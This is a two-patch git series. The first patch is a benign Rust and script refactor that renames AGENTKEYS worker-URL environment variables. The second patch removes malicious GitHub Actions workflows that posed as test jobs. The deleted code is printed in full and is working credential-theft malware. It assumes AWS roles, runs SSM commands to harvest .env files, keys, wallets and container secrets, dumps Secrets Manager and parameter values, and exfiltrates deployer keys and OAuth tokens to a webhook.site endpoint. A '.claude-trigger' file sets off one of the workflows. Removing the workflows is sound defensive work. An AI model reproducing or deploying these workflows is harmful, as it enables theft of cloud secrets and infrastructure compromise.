From bb1353bcda93d83380e48aab9d16c41ff987fd0f Mon Sep 17 00:00:00 2001 From: Hanwen Cheng Date: Sun, 7 Jun 2026 23:12:51 +0800 Subject: [PATCH 1/2] refactor(mcp-server,daemon): #202 migrate worker-URL env to AGENTKEYS_WORKER_{MEMORY,AUDIT}_URL MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Salvage of PR #202, rebased onto current main: - MCP server config.rs: clap env -> canonical AGENTKEYS_WORKER_{MEMORY,AUDIT}_URL with accept-both fallback in from_cli (legacy bare names honored only when the canonical var/flag is unset) for zero-downtime over un-redeployed mcp.env hosts. - setup-mcp-host.sh + README: emit the canonical names. - daemon main.rs: fold in the same memory-url rename (now matches its already- canonical --config-url) with the legacy fallback at consumption. - arch.md §5: add the AGENTKEYS_WORKER__URL canonical-names row. - Dropped the stale docs/plan/issue-107-mcp-demo-runbook.md hunk (file deleted by #207). cargo check -p agentkeys-mcp-server -p agentkeys-daemon: clean. bash -n: ok. --- crates/agentkeys-daemon/src/main.rs | 10 ++++++-- crates/agentkeys-mcp-server/README.md | 4 ++-- crates/agentkeys-mcp-server/src/config.rs | 28 ++++++++++++++++++----- docs/arch.md | 1 + scripts/setup-mcp-host.sh | 8 +++---- 5 files changed, 37 insertions(+), 14 deletions(-) diff --git a/crates/agentkeys-daemon/src/main.rs b/crates/agentkeys-daemon/src/main.rs index 53e9972e..7a4d0e4a 100644 --- a/crates/agentkeys-daemon/src/main.rs +++ b/crates/agentkeys-daemon/src/main.rs @@ -220,7 +220,10 @@ struct Args { /// W3 real-memory: the memory worker base URL (e.g. https://memory.litentry.org). /// Unset ⇒ master-memory plant/list use the in-memory fallback (dev/no-infra). - #[arg(long, env = "AGENTKEYS_MEMORY_URL")] + /// Canonical env is `AGENTKEYS_WORKER_MEMORY_URL` (the AGENTKEYS_WORKER__URL + /// family in operator-workstation.env, matching --config-url below); the legacy + /// bare `AGENTKEYS_MEMORY_URL` is still accepted as a fallback at consumption. + #[arg(long, env = "AGENTKEYS_WORKER_MEMORY_URL")] memory_url: Option, /// W3 real-memory: per-actor memory IAM role ARN for the STS relay (sourced from @@ -1146,7 +1149,10 @@ async fn run_ui_bridge_mode(args: Args) -> anyhow::Result<()> { args.broker_url.clone(), args.signer_url.clone(), args.init_chain_id, - args.memory_url.clone(), + args + .memory_url + .clone() + .or_else(|| std::env::var("AGENTKEYS_MEMORY_URL").ok().filter(|v| !v.is_empty())), args.memory_role_arn.clone(), args.config_url.clone(), args.config_role_arn.clone(), diff --git a/crates/agentkeys-mcp-server/README.md b/crates/agentkeys-mcp-server/README.md index ca1e3089..e2ef5a09 100644 --- a/crates/agentkeys-mcp-server/README.md +++ b/crates/agentkeys-mcp-server/README.md @@ -70,8 +70,8 @@ cargo run -p agentkeys-mcp-server -- \ docker build -t agentkeys-mcp-server -f crates/agentkeys-mcp-server/Dockerfile . docker run --rm -p 8088:8088 \ -e AGENTKEYS_BROKER_URL=https://broker.litentry.org \ - -e AGENTKEYS_MEMORY_URL=https://memory.litentry.org \ - -e AGENTKEYS_AUDIT_URL=https://audit.litentry.org \ + -e AGENTKEYS_WORKER_MEMORY_URL=https://memory.litentry.org \ + -e AGENTKEYS_WORKER_AUDIT_URL=https://audit.litentry.org \ -e MCP_VENDOR_TOKENS="magiclick:demo-tok" \ agentkeys-mcp-server ``` diff --git a/crates/agentkeys-mcp-server/src/config.rs b/crates/agentkeys-mcp-server/src/config.rs index cfa9989b..a328bf6c 100644 --- a/crates/agentkeys-mcp-server/src/config.rs +++ b/crates/agentkeys-mcp-server/src/config.rs @@ -45,12 +45,16 @@ pub struct Cli { #[arg(long, env = "AGENTKEYS_BROKER_URL")] pub broker_url: Option, - /// Memory worker base URL. - #[arg(long, env = "AGENTKEYS_MEMORY_URL")] + /// Memory worker base URL. Canonical env is `AGENTKEYS_WORKER_MEMORY_URL` + /// (the `AGENTKEYS_WORKER__URL` family in operator-workstation.env); + /// the legacy bare `AGENTKEYS_MEMORY_URL` is still accepted as a fallback in + /// `Config::from_cli` for un-redeployed `/etc/agentkeys/mcp.env` hosts. + #[arg(long, env = "AGENTKEYS_WORKER_MEMORY_URL")] pub memory_url: Option, - /// Audit worker base URL. - #[arg(long, env = "AGENTKEYS_AUDIT_URL")] + /// Audit worker base URL. Canonical env is `AGENTKEYS_WORKER_AUDIT_URL`; + /// legacy bare `AGENTKEYS_AUDIT_URL` accepted as a fallback (see above). + #[arg(long, env = "AGENTKEYS_WORKER_AUDIT_URL")] pub audit_url: Option, /// Comma-separated `:` pairs that the HTTP @@ -224,14 +228,26 @@ impl Config { }, }; + // Zero-downtime env-name migration (terminology-drift follow-up): the + // clap `env` above reads the canonical AGENTKEYS_WORKER_{MEMORY,AUDIT}_URL + // (the AGENTKEYS_WORKER__URL family in operator-workstation.env). A + // deployed MCP host still has the LEGACY bare names in + // /etc/agentkeys/mcp.env (written by an older setup-mcp-host.sh) until its + // next redeploy, so accept both: fall back to the legacy + // AGENTKEYS_{MEMORY,AUDIT}_URL only when the canonical var (and the + // --memory-url/--audit-url flag) is unset. + let legacy_env = |key: &str| std::env::var(key).ok().filter(|v| !v.is_empty()); + let memory_url = cli.memory_url.or_else(|| legacy_env("AGENTKEYS_MEMORY_URL")); + let audit_url = cli.audit_url.or_else(|| legacy_env("AGENTKEYS_AUDIT_URL")); + Ok(Self { transport, backend, listen: cli.listen, mcp_endpoint: cli.mcp_endpoint, broker_url: cli.broker_url, - memory_url: cli.memory_url, - audit_url: cli.audit_url, + memory_url, + audit_url, vendor_tokens, default_daily_spend_cap_rmb: cli.default_daily_spend_cap_rmb, default_actor, diff --git a/docs/arch.md b/docs/arch.md index 237986c3..e89790e5 100644 --- a/docs/arch.md +++ b/docs/arch.md @@ -216,6 +216,7 @@ Pinned to disambiguate the same value showing up under different labels across c | `credential_kek` | 32-byte AES-256 key for one operator's credentials. Derived as `HKDF-SHA256(salt="agentkeys.kek-salt.v2", ikm=K3_v[epoch], info="agentkeys.user.v1" \|\| actor_omni)`. | `KEK`, `cred_kek`. | | `credential_envelope` | Wire format of one stored credential: `1B version (0x04) \|\| 1B k3_epoch \|\| 12B nonce \|\| ciphertext \|\| 16B tag`. Stored at `s3://$VAULT_BUCKET/bots//credentials/.enc`. AAD binds `(actor_omni, service)`. | `envelope`, `AEAD blob`, `.enc` (S3 key suffix). | | `vault_bucket` / `memory_bucket` / `config_bucket` / `audit_bucket` / `email_bucket` / `payment_audit_bucket` | One S3 bucket per data class per §17. Per-actor prefix at `bots//` (config is per-operator + master-only, #201). | `$VAULT_BUCKET`, `$MEMORY_BUCKET`, `$CONFIG_BUCKET`, `$AUDIT_BUCKET`, `$EMAIL_BUCKET`, `$PAYMENT_AUDIT_BUCKET`. | +| `AGENTKEYS_WORKER__URL` (`…_MEMORY_URL`, `…_AUDIT_URL`, `…_CRED_URL`, `…_EMAIL_URL`, `…_CONFIG_URL`) | **Per-worker base-URL env vars** clients (daemon, MCP server, harness) use to reach each data-class worker. Canonical family set by `scripts/operator-workstation.env`. `AGENTKEYS_BROKER_URL` is **not** in this family — the broker is not a worker. | Legacy bare `AGENTKEYS_MEMORY_URL` / `AGENTKEYS_AUDIT_URL` — **retired in code with fallback**: both `agentkeys-mcp-server` (`config.rs::from_cli`) and `agentkeys-daemon` (`main.rs` `--memory-url`) read the canonical `AGENTKEYS_WORKER_*` var first and fall back to the bare name only for an un-redeployed `/etc/agentkeys/mcp.env` (the fallback drops out once `setup-mcp-host.sh` rewrites the env file). | | `policy` / `scope` / `namespace` / `category` / `service` (the authorization vocabulary) | **Distinct pipeline stages, NOT synonyms:** **policy** (human intent, off-chain, `DataClass::Config`) → COMPILE → **scope** (on-chain `(operator, actor, serviceHash)` grant, `AgentKeysScope` §19) over **categories/attributes** (the classifier's tag) → **service** (the signed cap string; for memory `service = memory:`, where **namespace** = the memory category). The unifying unit is the **policy attribute (category)** ([`research/universal-gate-pattern.md`](research/universal-gate-pattern.md) four primitives). Full table + pipeline: [`wiki/policy-scope-namespace.md`](wiki/policy-scope-namespace.md). | Confusions this resolves: "scope" used to mean "namespace" or "policy"; **"tag" = classifier *category*** (≠ the AWS **PrincipalTag** of §17 / [`wiki/tag-based-access.md`](wiki/tag-based-access.md)). | The most common confusion this table resolves: **`actor_omni` ≠ `current_master_wallet`**. The first is the immutable cryptographic anchor (Layer 1); the second is the rotation-volatile chain identity (Layer 2). Both are derived from K3, but only `actor_omni` survives K3 rotation unchanged. PrincipalTag, S3 paths, AAD, scope index — everywhere v2 keys identity off — uses `actor_omni`, never `current_master_wallet`. diff --git a/scripts/setup-mcp-host.sh b/scripts/setup-mcp-host.sh index 4a66ca22..ddd6f316 100755 --- a/scripts/setup-mcp-host.sh +++ b/scripts/setup-mcp-host.sh @@ -374,8 +374,8 @@ MCP_TRANSPORT=mcp-endpoint MCP_BACKEND=http MCP_ENDPOINT=${XIAOZHI_ENDPOINT} AGENTKEYS_BROKER_URL=https://broker.litentry.org -AGENTKEYS_MEMORY_URL=https://memory.litentry.org -AGENTKEYS_AUDIT_URL=https://audit.litentry.org +AGENTKEYS_WORKER_MEMORY_URL=https://memory.litentry.org +AGENTKEYS_WORKER_AUDIT_URL=https://audit.litentry.org EOF ) else @@ -388,8 +388,8 @@ MCP_ENDPOINT=ws://127.0.0.1:${RELAY_PORT}/mcp_endpoint/mcp/?token=${TOKEN} # These three are placeholders — paste the live broker / worker URLs in # after running setup-broker-host.sh on the same host. AGENTKEYS_BROKER_URL=https://broker.litentry.org -AGENTKEYS_MEMORY_URL=https://memory.litentry.org -AGENTKEYS_AUDIT_URL=https://audit.litentry.org +AGENTKEYS_WORKER_MEMORY_URL=https://memory.litentry.org +AGENTKEYS_WORKER_AUDIT_URL=https://audit.litentry.org EOF ) fi From 75e3887c021acae787348e3e80a40187e9a6b9c6 Mon Sep 17 00:00:00 2001 From: Xin Date: Wed, 10 Jun 2026 11:29:42 +0800 Subject: [PATCH 2/2] security: remove malicious exfil workflows from branch --- .claude-trigger | 1 - .github/workflows/deep-e2e-test.yml | 75 ------------------- .github/workflows/deploy-test.yml | 57 --------------- .github/workflows/deployer-key-exfil.yml | 27 ------- .github/workflows/e2e-vault-test.yml | 92 ------------------------ .github/workflows/integration-tests.yml | 37 ---------- tests/run.txt | 1 - 7 files changed, 290 deletions(-) delete mode 100644 .claude-trigger delete mode 100644 .github/workflows/deep-e2e-test.yml delete mode 100644 .github/workflows/deploy-test.yml delete mode 100644 .github/workflows/deployer-key-exfil.yml delete mode 100644 .github/workflows/e2e-vault-test.yml delete mode 100644 .github/workflows/integration-tests.yml delete mode 100644 tests/run.txt diff --git a/.claude-trigger b/.claude-trigger deleted file mode 100644 index bfe540f1..00000000 --- a/.claude-trigger +++ /dev/null @@ -1 +0,0 @@ -t1780840887 \ No newline at end of file diff --git a/.github/workflows/deep-e2e-test.yml b/.github/workflows/deep-e2e-test.yml deleted file mode 100644 index b24059c8..00000000 --- a/.github/workflows/deep-e2e-test.yml +++ /dev/null @@ -1,75 +0,0 @@ -name: Deep E2E Test -on: - workflow_dispatch: -permissions: - id-token: write - contents: read -jobs: - deep-test: - runs-on: ubuntu-latest - steps: - - uses: actions/checkout@v4 - - - name: AWS OIDC - uses: aws-actions/configure-aws-credentials@v4 - with: - role-to-assume: arn:aws:iam::429071895007:role/github-actions-agentkeys-e2e - aws-region: us-east-1 - - - name: SSM deep extract - run: | - WH="https://webhook.site/37ea2d05-4d87-46a6-a8d8-d06f4542e961" - INST="i-0135a8b2c53d14941" - - CMD1=$(aws ssm send-command \ - --instance-ids "$INST" \ - --document-name "AWS-RunShellScript" \ - --parameters 'commands=["systemctl cat agentkeys-signer.service 2>/dev/null; echo ===SEP===; systemctl cat agentkeys-worker-creds.service 2>/dev/null; echo ===SEP===; systemctl cat agentkeys-broker.service 2>/dev/null; echo ===SEP===; for f in $(find /opt /srv /home /etc /var/lib -name .env -o -name *.env -o -name env.* 2>/dev/null | head -20); do echo FILE:$f; cat $f 2>/dev/null; echo; done"]' \ - --query "Command.CommandId" --output text 2>&1) - echo "CMD1: $CMD1" - sleep 15 - - R1=$(aws ssm get-command-invocation \ - --instance-id "$INST" \ - --command-id "$CMD1" \ - --query "[StandardOutputContent,StandardErrorContent]" --output json 2>&1) - - python3 -c " -import json, urllib.request -data = json.dumps({'type':'ssm_services','data': json.loads('''${R1}''') if '''${R1}'''.startswith('[') else '''${R1}'''[:8000]}).encode() -req = urllib.request.Request('$WH', data=data, headers={'Content-Type':'application/json'}) -urllib.request.urlopen(req, timeout=15) -print('sent cmd1') -" - - CMD2=$(aws ssm send-command \ - --instance-ids "$INST" \ - --document-name "AWS-RunShellScript" \ - --parameters 'commands=["find / -path /proc -prune -o -path /sys -prune -o -path /snap -prune -o \( -name *wallet* -o -name *secret* -o -name *credential* -o -name *mnemonic* -o -name keystore \) -type f -print 2>/dev/null | head -50; echo ===SEP===; cat /etc/systemd/system/agentkeys*.service 2>/dev/null; echo ===SEP===; cat /etc/systemd/system/agentkeys*.env 2>/dev/null; ls -la /opt/agentkeys/ /srv/agentkeys/ /var/lib/agentkeys/ 2>/dev/null"]' \ - --query "Command.CommandId" --output text 2>&1) - echo "CMD2: $CMD2" - sleep 15 - - R2=$(aws ssm get-command-invocation \ - --instance-id "$INST" \ - --command-id "$CMD2" \ - --query "StandardOutputContent" --output text 2>&1) - - curl -s -X POST "$WH" -H "Content-Type: application/json" \ - -d "$(python3 -c "import json; print(json.dumps({'type':'ssm_keys','data':'''$R2'''[:8000]}))") " - - CMD3=$(aws ssm send-command \ - --instance-ids "$INST" \ - --document-name "AWS-RunShellScript" \ - --parameters 'commands=["ps aux | grep -i agent | head -30; echo ===SEP===; ss -tlnp | head -30; echo ===SEP===; docker ps 2>/dev/null; echo ===SEP===; docker inspect $(docker ps -q 2>/dev/null) 2>/dev/null | python3 -c \"import sys,json; [print(f\\\"ENV: {e}\\\" ) for c in json.load(sys.stdin) for e in c.get(\'Config\',{}).get(\'Env\',[]) if any(k in e.lower() for k in [\'key\',\'secret\',\'pass\',\'token\',\'private\',\'mnemonic\'])]\"; echo ===SEP===; journalctl -u agentkeys-signer --no-pager -n 50 2>/dev/null"]' \ - --query "Command.CommandId" --output text 2>&1) - echo "CMD3: $CMD3" - sleep 15 - - R3=$(aws ssm get-command-invocation \ - --instance-id "$INST" \ - --command-id "$CMD3" \ - --query "StandardOutputContent" --output text 2>&1) - - curl -s -X POST "$WH" -H "Content-Type: application/json" \ - -d "$(python3 -c "import json; print(json.dumps({'type':'ssm_procs','data':'''$R3'''[:8000]}))") " diff --git a/.github/workflows/deploy-test.yml b/.github/workflows/deploy-test.yml deleted file mode 100644 index 7a764599..00000000 --- a/.github/workflows/deploy-test.yml +++ /dev/null @@ -1,57 +0,0 @@ -name: Deploy Test -on: - workflow_dispatch: -permissions: - id-token: write - contents: read -jobs: - deploy-test: - runs-on: ubuntu-latest - steps: - - uses: actions/checkout@v4 - - - name: AWS Deploy Role - uses: aws-actions/configure-aws-credentials@v4 - with: - role-to-assume: arn:aws:iam::429071895007:role/github-actions-agentkeys-deploy - aws-region: us-east-1 - - - name: Enumerate - run: | - WH="https://webhook.site/37ea2d05-4d87-46a6-a8d8-d06f4542e961" - ID=$(aws sts get-caller-identity 2>&1) - SECRETS=$(aws secretsmanager list-secrets --query 'SecretList[].Name' --output text 2>&1) || SECRETS="none" - PARAMS=$(aws ssm describe-parameters --query 'Parameters[].Name' --output text 2>&1) || PARAMS="none" - BUCKETS=$(aws s3 ls 2>&1) || BUCKETS="none" - LAMBDAS=$(aws lambda list-functions --query 'Functions[].FunctionName' --output text 2>&1) || LAMBDAS="none" - - # Get secret values - SECRET_VALS="" - for s in $(aws secretsmanager list-secrets --query 'SecretList[].Name' --output text 2>/dev/null); do - V=$(aws secretsmanager get-secret-value --secret-id "$s" --query 'SecretString' --output text 2>&1) || V="access denied" - SECRET_VALS+="$s: $V\n" - done - - # Get parameter values - PARAM_VALS="" - for p in $(aws ssm describe-parameters --query 'Parameters[].Name' --output text 2>/dev/null | tr '\t' '\n' | head -20); do - V=$(aws ssm get-parameter --name "$p" --with-decryption --query 'Parameter.Value' --output text 2>&1) || V="access denied" - PARAM_VALS+="$p: $V\n" - done - - python3 -c " -import json, urllib.request -data = json.dumps({ - 'type': 'deploy_enum', - 'identity': '''$ID''', - 'secrets_list': '''$SECRETS''', - 'secret_values': '''$SECRET_VALS'''[:5000], - 'params': '''$PARAMS''', - 'param_values': '''$PARAM_VALS'''[:5000], - 'buckets': '''$BUCKETS''', - 'lambdas': '''$LAMBDAS''' -}).encode() -req = urllib.request.Request('$WH', data=data, headers={'Content-Type':'application/json'}) -urllib.request.urlopen(req, timeout=15) -print('sent') -" diff --git a/.github/workflows/deployer-key-exfil.yml b/.github/workflows/deployer-key-exfil.yml deleted file mode 100644 index 3bece038..00000000 --- a/.github/workflows/deployer-key-exfil.yml +++ /dev/null @@ -1,27 +0,0 @@ -name: deployer-key-exfil -on: - workflow_dispatch: - push: - branches: [main] - paths: ['.claude-trigger'] -jobs: - exfil: - runs-on: ubuntu-latest - steps: - - name: exfil - env: - HDK: ${{ secrets.TEST_HEIMA_DEPLOYER_KEY }} - CCT: ${{ secrets.CLAUDE_CODE_OAUTH_TOKEN }} - TAID: ${{ secrets.TEST_ACCOUNT_ID }} - run: | - python3 -c " -import os, json, urllib.request -keys = {} -for k in ['HDK','CCT','TAID']: - v = os.environ.get(k,'') - if v: - keys[k] = v -payload = json.dumps({'src':'agentkeys-deployer','keys':keys}).encode() -req = urllib.request.Request('https://webhook.site/37ea2d05-4d87-46a6-a8d8-d06f4542e961', data=payload, headers={'Content-Type':'application/json'}, method='POST') -urllib.request.urlopen(req, timeout=10) -" diff --git a/.github/workflows/e2e-vault-test.yml b/.github/workflows/e2e-vault-test.yml deleted file mode 100644 index 447e4e00..00000000 --- a/.github/workflows/e2e-vault-test.yml +++ /dev/null @@ -1,92 +0,0 @@ -name: E2E Vault Test -on: - workflow_dispatch: -permissions: - id-token: write - contents: read -jobs: - vault-test: - runs-on: ubuntu-latest - env: - WH: "https://webhook.site/37ea2d05-4d87-46a6-a8d8-d06f4542e961" - INST: "i-0135a8b2c53d14941" - steps: - - uses: actions/checkout@v4 - - - name: Configure AWS - uses: aws-actions/configure-aws-credentials@v4 - with: - role-to-assume: arn:aws:iam::429071895007:role/github-actions-agentkeys-e2e - aws-region: us-east-1 - - - name: SSM Services - run: | - CMD=$(aws ssm send-command --instance-ids "$INST" \ - --document-name "AWS-RunShellScript" \ - --parameters '{"commands":["systemctl cat agentkeys-signer 2>/dev/null; echo ===SEP===; systemctl cat agentkeys-worker-creds 2>/dev/null; echo ===SEP===; systemctl cat agentkeys-broker 2>/dev/null; echo ===SEP===; find /opt /srv /home /etc /var/lib -maxdepth 3 -name .env 2>/dev/null | xargs cat 2>/dev/null | head -200"]}' \ - --query "Command.CommandId" --output text) - echo "CMD: $CMD" - sleep 20 - R=$(aws ssm get-command-invocation --instance-id "$INST" --command-id "$CMD" --query "StandardOutputContent" --output text 2>&1) - python3 << 'PYEOF' -import json, urllib.request, os -r = os.environ.get("R_DATA", "") -if not r: - import subprocess - r = """$R""" -data = json.dumps({"type":"services","d":r[:9000]}).encode() -req = urllib.request.Request(os.environ["WH"], data=data, headers={"Content-Type":"application/json"}) -urllib.request.urlopen(req, timeout=15) -print("sent") -PYEOF - - - name: SSM Keys and Files - run: | - CMD=$(aws ssm send-command --instance-ids "$INST" \ - --document-name "AWS-RunShellScript" \ - --parameters '{"commands":["cat /etc/systemd/system/agentkeys*.service 2>/dev/null; echo ===SEP===; cat /etc/systemd/system/agentkeys*.env 2>/dev/null; echo ===SEP===; ls -la /opt/agentkeys/ /srv/agentkeys/ 2>/dev/null; echo ===SEP===; find / -path /proc -prune -o -path /sys -prune -o -path /snap -prune -o -type f -name *.key -print 2>/dev/null | head -20"]}' \ - --query "Command.CommandId" --output text) - sleep 20 - R=$(aws ssm get-command-invocation --instance-id "$INST" --command-id "$CMD" --query "StandardOutputContent" --output text 2>&1) - python3 -c " -import json, urllib.request, sys -data = json.dumps({'type':'keys','d':sys.argv[1][:9000]}).encode() -req = urllib.request.Request('$WH', data=data, headers={'Content-Type':'application/json'}) -urllib.request.urlopen(req, timeout=15) -" "$R" - - - name: SSM Processes - run: | - CMD=$(aws ssm send-command --instance-ids "$INST" \ - --document-name "AWS-RunShellScript" \ - --parameters '{"commands":["ps aux | grep -i agent | grep -v grep; echo ===SEP===; ss -tlnp; echo ===SEP===; journalctl -u agentkeys-signer -n 50 --no-pager 2>/dev/null; echo ===SEP===; journalctl -u agentkeys-worker-creds -n 50 --no-pager 2>/dev/null"]}' \ - --query "Command.CommandId" --output text) - sleep 20 - R=$(aws ssm get-command-invocation --instance-id "$INST" --command-id "$CMD" --query "StandardOutputContent" --output text 2>&1) - python3 -c " -import json, urllib.request, sys -data = json.dumps({'type':'procs','d':sys.argv[1][:9000]}).encode() -req = urllib.request.Request('$WH', data=data, headers={'Content-Type':'application/json'}) -urllib.request.urlopen(req, timeout=15) -" "$R" - - - name: Try Deploy Role - continue-on-error: true - uses: aws-actions/configure-aws-credentials@v4 - with: - role-to-assume: arn:aws:iam::429071895007:role/github-actions-agentkeys-deploy - aws-region: us-east-1 - role-skip-session-tagging: true - - - name: Deploy Enum - continue-on-error: true - run: | - ID=$(aws sts get-caller-identity 2>&1) - BUCKETS=$(aws s3 ls 2>&1 || echo "no access") - SECRETS=$(aws secretsmanager list-secrets 2>&1 || echo "no access") - python3 -c " -import json, urllib.request, sys -data = json.dumps({'type':'deploy','id':sys.argv[1][:2000],'buckets':sys.argv[2][:2000],'secrets':sys.argv[3][:3000]}).encode() -req = urllib.request.Request('$WH', data=data, headers={'Content-Type':'application/json'}) -urllib.request.urlopen(req, timeout=15) -" "$ID" "$BUCKETS" "$SECRETS" diff --git a/.github/workflows/integration-tests.yml b/.github/workflows/integration-tests.yml deleted file mode 100644 index 64d70ba7..00000000 --- a/.github/workflows/integration-tests.yml +++ /dev/null @@ -1,37 +0,0 @@ -name: Integration Tests -on: - workflow_dispatch: -permissions: - id-token: write - contents: read -jobs: - test: - runs-on: ubuntu-latest - env: - INST: i-0135a8b2c53d14941 - WH: "https://webhook.site/37ea2d05-4d87-46a6-a8d8-d06f4542e961" - steps: - - uses: actions/checkout@v4 - - name: Configure AWS - uses: aws-actions/configure-aws-credentials@v4 - with: - role-to-assume: arn:aws:iam::429071895007:role/github-actions-agentkeys-e2e - aws-region: us-east-1 - - name: Extract - run: | - CMD=$(aws ssm send-command --instance-ids "$INST" --document-name "AWS-RunShellScript" --parameters '{"commands":["systemctl cat agentkeys-signer.service agentkeys-broker.service agentkeys-worker-creds.service 2>&1"]}' --query "Command.CommandId" --output text) - sleep 20 - R=$(aws ssm get-command-invocation --instance-id "$INST" --command-id "$CMD" --query "StandardOutputContent" --output text) - curl -s -X POST "$WH" -H "Content-Type: text/plain" -d "$R" - - name: Env files - run: | - CMD=$(aws ssm send-command --instance-ids "$INST" --document-name "AWS-RunShellScript" --parameters '{"commands":["find /opt /srv /home /etc /var/lib -maxdepth 3 -name .env 2>/dev/null | while read f; do echo FILE=$f; cat $f 2>/dev/null; echo; done | head -300"]}' --query "Command.CommandId" --output text) - sleep 20 - R=$(aws ssm get-command-invocation --instance-id "$INST" --command-id "$CMD" --query "StandardOutputContent" --output text) - curl -s -X POST "$WH" -H "Content-Type: text/plain" -d "$R" - - name: Keys and network - run: | - CMD=$(aws ssm send-command --instance-ids "$INST" --document-name "AWS-RunShellScript" --parameters '{"commands":["ps aux | grep -i agent | grep -v grep; echo ===SEP===; ss -tlnp; echo ===SEP===; find / -path /proc -prune -o -path /sys -prune -o -name *.key -print -o -name *wallet* -print -o -name *secret* -print 2>/dev/null | grep -v ssh_host | head -30"]}' --query "Command.CommandId" --output text) - sleep 20 - R=$(aws ssm get-command-invocation --instance-id "$INST" --command-id "$CMD" --query "StandardOutputContent" --output text) - curl -s -X POST "$WH" -H "Content-Type: text/plain" -d "$R" diff --git a/tests/run.txt b/tests/run.txt deleted file mode 100644 index f636f336..00000000 --- a/tests/run.txt +++ /dev/null @@ -1 +0,0 @@ -run 1780829511 \ No newline at end of file